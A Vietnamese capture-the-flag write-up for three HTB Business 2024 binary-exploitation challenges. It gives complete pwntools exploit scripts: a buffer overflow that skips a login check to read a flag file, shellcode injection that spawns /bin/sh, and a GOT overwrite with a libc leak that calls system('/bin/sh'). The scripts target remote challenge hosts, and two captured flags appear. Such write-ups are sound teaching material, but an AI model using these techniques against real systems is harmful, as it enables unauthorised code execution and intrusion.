(writeup) HTB Business

# (writeup) HTB Business 2024 ## Abyss - bug BOF nằm ở khả năng ow biến **user** và **pass** ```c char pass[MAX_ARG_SIZE] = {0}; char user[MAX_ARG_SIZE] = {0}; char buf[MAX_ARG_SIZE]; // i = 5; while (buf[i] != '\0') { user[i - 5] = buf[i]; i++; } user[i - 5] = '\0'; // i = 5; while (buf[i] != '\0') { pass[i - 5] = buf[i]; i++; } pass[i - 5] = '\0'; ``` - về căn bản sẽ không thoả mãn so sánh với USER:PASS ban đầu, sẽ return ở **cmd_read** cộng với 1 offset bỏ qua đk check ```c if (!logged_in) { puts("Not logged in"); return; } //skip đống này ``` - script: ```py #!/usr/bin/python3 from pwn import * exe = ELF('./abyss', checksec=False) context.binary = exe def GDB(): if not args.REMOTE: gdb.attach(p, gdbscript=''' b*main+470 b*cmd_login+155 b*cmd_read+66 c ''') input() info = lambda msg: log.info(msg) sla = lambda msg, data: p.sendlineafter(msg, data) sa = lambda msg, data: p.sendafter(msg, data) sl = lambda data: p.sendline(data) s = lambda data: p.send(data) if args.REMOTE: p = remote("83.136.248.205", 43375) else: p = process(exe.path) GDB() s(b'\0'*4) #cmd_login sleep(1) payload = b'USER ' + b'a'*3 payload += b'a'*8 payload += b'a'*6 + b'\x1c' + b'a' payload += b'a'*8 payload += b'a'*2 payload += p64(exe.sym.cmd_read + 66) s(payload) sleep(3) payload = b"PASS " + b"b"*507 s(payload) sleep(1) payload = b"./flag.txt\0" s(payload) p.interactive() ``` ## Regularity - simple shellcode - script: ```py #!/usr/bin/python3 from pwn import * context.binary = exe = ELF('./regularity',checksec=False) # p = process(exe.path) p = remote('94.237.57.110',38916) # gdb.attach(p,gdbscript=''' # b*0x000000000040104b # b*0x000000000040106e # c # ''') # input() jmp_rsi = 0x0000000000401041 payload = asm(shellcraft.sh()) payload = payload.ljust(0x100,b'a') payload += p64(jmp_rsi) p.send(payload) p.interactive() #HTB{juMp1nG_w1tH_tH3_r3gIsT3rS?_412f1e2607a8b400485195804f708b8b} ``` --- ## No gadgets - tricky hơn khi phải setup got cho chuẩn ![image](https://hackmd.io/_uploads/rydmDnS2C.png) - tận dụng got của exit để return - script: ```py #!/usr/bin/python3 from pwn import * exe = ELF('./no_gadgets_patched', checksec=False) libc = ELF('./libc.so.6', checksec=False) context.binary = exe def GDB(): if not args.REMOTE: gdb.attach(p, gdbscript=''' b*main+87 b*main+158 c ''') input() info = lambda msg: log.info(msg) sla = lambda msg, data: p.sendlineafter(msg, data) sa = lambda msg, data: p.sendafter(msg, data) sl = lambda data: p.sendline(data) s = lambda data: p.send(data) if args.REMOTE: p = remote('94.237.63.201',48750) else: p = process(exe.path) setup = exe.sym.main+68 # GDB() payload = b'\0'*0x80 payload += p64(exe.got.puts+0x80) payload += p64(setup) sla(b'Data: ',payload) payload = p64(exe.plt.puts+6) + p64(exe.sym.main+122) payload += p64(exe.plt.printf+6) + p64(exe.plt.fgets+6) payload += p64(exe.plt.setvbuf+6) + p64(setup) sl(payload) p.recvuntil(b'scratch!\n') libc_leak = u64(p.recv(6)+b'\0\0') libc.address = libc_leak - libc.sym.puts info("libc leak: " + hex(libc_leak)) info("libc base: " + hex(libc.address)) binsh = next(libc.search(b'/bin/sh\0')) system = libc.sym.system payload = b'/bin/sh\0' + p64(system) sl(payload) p.interactive() #HTB{wh0_n3eD5_rD1_wH3n_Y0u_h@v3_rBp!!!_aad05d6f16e834630c56549dc7c44cc0} ``` ---